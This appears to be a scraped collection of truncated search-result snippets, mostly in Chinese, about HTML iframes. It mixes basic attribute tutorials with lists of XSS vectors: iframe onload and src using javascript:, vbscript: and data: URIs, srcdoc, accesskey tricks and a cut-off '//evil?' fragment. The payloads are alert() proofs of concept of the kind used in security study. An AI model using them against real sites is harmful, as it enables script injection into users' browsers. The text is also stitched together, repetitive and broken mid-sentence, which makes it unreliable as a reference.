<iframe onload="alert(1)"></iframe> 1.2 src 执行 javascript 代码 <iframe src="javascript:alert(1)"></iframe> 3. IE 下 vbscript 执行代码 <iframe src="vbscript:msgbox(1)"></iframe> 1.4 Chrome 下 data 协议执行代码 <iframe src="data:text/html,<script>alert(1)</script>"></iframe> ...
1.1 最好懂的,onload执行js <iframe onload="alert(1)"></iframe> 1.2 src 执行javascript代码 <iframe src="javascript:alert(1)"></iframe> 1.3 IE下vbscript执行代码 <iframe src="vbscript:msgbox(1)"></iframe> 1.4 Chrome下data协议执行代码 <iframe src="data:text/html,<script>alert(1)</script...
A:<iframe id="mainIframe" name="mainIframe" src="/main.html" frameborder="0" scrolling="auto" ></iframe> B:<iframe id="mainIframe" name="mainIframe" src="//www.baidu.com" frameborder="0" scrolling="auto" ></iframe> 使用A时,因为同域,父页面可以对子页面进行改写,反之亦然。 使用B...
srcdoc=""> 对实体使用srcdoc在页面上的任何位置(甚至在表单外部)单击提交元素 XSS 隐藏的输入:访问键属性可以在通常无法利用的元素上启用XSS (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X) 链接元素:访问键属性可以在通常无法利用的元素上启用XSS <link rel...iframesrc<iframesrc="//evil? Embed...
<iframe src="javascript:alert(1)"></iframe> 是的,iframe 的 src 可以放 javascript: 開頭的這種格式,就可以直接執行 JavaScript 程式碼,達成 XSS。順帶一提,<form> 的action 跟 <a> 的href 也都可以放,這個我在接觸資安才發現我不懂前端有稍微提到。 而且不僅如此,HTML 屬性裡的東西是可以編碼的,有三...
URL 参数:将参数作为 URL 的一部分传递给应用 B。在<iframe>的src属性中添加参数,应用 B 可以通过...
通常我们使用iframe直接直接在页面嵌套iframe标签指定src就可以了。 <iframesrc="demo_iframe_sandbox.htm"></iframe> 但是,有追求的我们,并不是想要这么low的iframe. 我们来看看在iframe中还可以设置些什么属性 iframe常用属性:1.frameborder:是否显示边框,1(yes),0(no)2.height:框架作为一个普通元素的高度,...
通常我们使用iframe直接直接在页面嵌套iframe标签指定src就可以了。 <iframe src="demo_iframe_sandbox.htm"></iframe> 但是,有追求的我们,并不是想要这么low的iframe. 我们来看看在iframe中还可以设置些什么属性 iframe常用属性: 1.frameborder:是否显示边框,1(yes),0(no) ...
规定iframe 的名称,iframe 元素的 name 属性用于在 JavaScript 中引用元素,或者作为链接的目标; <html> <body> <iframe src="/example/html/demo_iframe.html"name="iframe_a"> <p>Your browser does not support iframes.</p> </iframe> <a href="http://www.w3school.com.cn"target="iframe_a">W3Sc...
1. iframe基本内涵 通常我们使用iframe直接直接在页面嵌套iframe标签指定src就可以了。 frame中还可以设置些什么属性 iframe常用属性:1.fra...